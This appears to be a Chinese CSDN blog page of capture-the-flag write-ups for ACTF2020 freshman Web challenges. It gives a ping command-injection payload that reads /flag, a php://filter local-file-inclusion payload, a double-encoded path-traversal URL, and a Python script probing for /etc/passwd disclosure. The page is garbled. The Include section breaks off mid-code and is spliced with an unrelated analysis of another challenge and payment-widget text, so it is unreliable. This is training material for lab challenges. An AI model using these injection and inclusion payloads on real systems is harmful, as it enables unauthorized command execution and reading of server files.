[ACTF2020 新生赛]Web汇总

[ACTF2020 新生赛]Web汇总

Exec

ping命令注入

‘127.0.0.1;’’

没有回显

截断符号配合普通命令

发现没有任何屏蔽

payload:

127.0.0.1;cat /flag

拓展:https://blog.csdn.net/qq_41079177/article/details/88321816

Include

根据题目和询问可能是 本地文件包含

通过

php://filter/read=convert.base64-encode/resource=

查看flag.php源码

?file=php://filter/read=convert.base64encode/resource=index.php

得到index.php的base64源码 转换

<meta charset="utf8">
<?php
error_reporting(0);
$file =
$_GET["file"];<
### 关于 BUUCTF ACTF2020 新生 Web Include 题目分析 #### 背景介绍 该题目属于Web安全领域中的文件包含漏洞利用。通过特定的URL参数绕过服务器端的安全检查,最终读取到目标文件的内容。 #### 技术细节解析 在本题中,攻击者可以控制`file`参数来指定要加载的文件路径。由于存在两层URL编码机制,使得原本受限的字符能够成功传递给PHP解释器处理: - `%253F`经过第一次解码变为`%3F` - 经第二次解码后成为问号(`?`),这有助于规避某些基于字符串匹配方式实现的简单防护措施[^1] 因此,当访问如下链接时: ``` http://url.to.target/?file=hint.php%253F/../../../../ffffllllaaaagggg ``` 实际上是在尝试从根目录向上回溯多个层级并请求名为`ffffllllaaaagggg`的目标文件。这种技巧常用于测试是否存在本地文件包含(Local File Inclusion, LFI)漏洞以及评估其严重程度。 #### 实际操作建议 为了验证上述理论,在实验环境中应当谨慎构建类似的payload,并确保只针对授权范围内的资源进行探索。同时注意观察返回的数据流特征变化情况,比如页面布局结构调整或是新增加了异常提示信息等现象。 ```python import requests target_url = "http://example.com/index.php" payload = "?file=hint.php%253F/../../../../etc/passwd" response = requests.get(target_url + payload) if b'root:x:' in response.content: print("[+] Potential Local File Inclusion vulnerability detected.") else: print("[-] No obvious signs of a vulnerable condition found.") ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值